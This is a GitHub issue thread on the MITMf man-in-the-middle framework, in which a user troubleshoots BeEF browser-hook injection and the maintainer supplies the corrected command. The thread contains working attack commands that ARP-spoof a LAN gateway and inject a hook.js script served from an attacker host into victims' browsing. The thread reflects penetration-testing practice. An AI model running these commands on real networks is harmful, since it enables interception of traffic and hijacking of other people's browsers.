### ISSUE TITLE
Beef Hook

### ISSUE THREAD

**Issue by Zaratros** [byt3bl33d3r/MITMf#45]
Hello !

Does the beefauto module not work yet ? I tried updating MITMf and nothing changed.
I got the same problem as here : https://github.com/byt3bl33d3r/MITMf/issues/9
 I also tried hooking the browser with --js-url [hook url], and it didn't work. I just want to use it the same way as the script injection feature in dSploit.

**Comment by byt3bl33d3r** [comment]
Hi, 
Im going to need more info like the full command string you used, what distro are you using and what MITMf version

**Comment by byt3bl33d3r** [comment]
hey @Zaratros any updates?

**Comment by Zaratros** [comment]
Hello,

I'm using the latest MITMf version with Kali. Here are the commands used :: 
python MITMf --arp --spoof --gateway 192.168.1.1 --beefauto
python MITMf --arp --spoof --gateway 192.168.1.1 --js-url http://192.168.X.X:3000/hook.js

Evrything else I tried works perfectly. It's very nice tool, and I hope to see more tools developped and integrated in it. For now, cSploit does the work perfectly (injecting the hook). Good luck !

**Comment by byt3bl33d3r** [comment]
@Zaratros just fyi, but i've tried using the beefautorun plugin with a direct connection to the proxy and with arp spoofing and it worked perfectly in both cases , so theres something wrong on your end.

the reason why the --js-url command isn't working is because you didn't enable the inject plugin, the correct command syntax is:
```python mitmf.py --spoof --arp --gateway 192.168.1.1 --inject --js-url http://192.168.X.X:3000```/hook.js

**Comment by Zaratros** [comment]
I'm really sorry. It was my fault for not knowing how to use it well. It works perfectly good now! Good luck developping more plugins to this wonderful tool :+1:

**Comment by Zaratros** [comment]
Hello !

After the recent changes, the command stopped working. It does literally nothing. I tried installing netfilterqueue using two different ways and nothing happened. Can you make us a small tutorial please ?

**Comment by byt3bl33d3r** [comment]
@Zaratros just tried it again with a direct connection and through arp spoofing, still works like it previously did... Something must be wrong with your setup

I really don't have time to make tutorials, I also don't think they are needed since the frameworks usage is really straight forward

**Comment by byt3bl33d3r** [comment]
@Zaratros Also the readme fully explains how to setup the netfilterqueue library, so please refer to that if your having problems
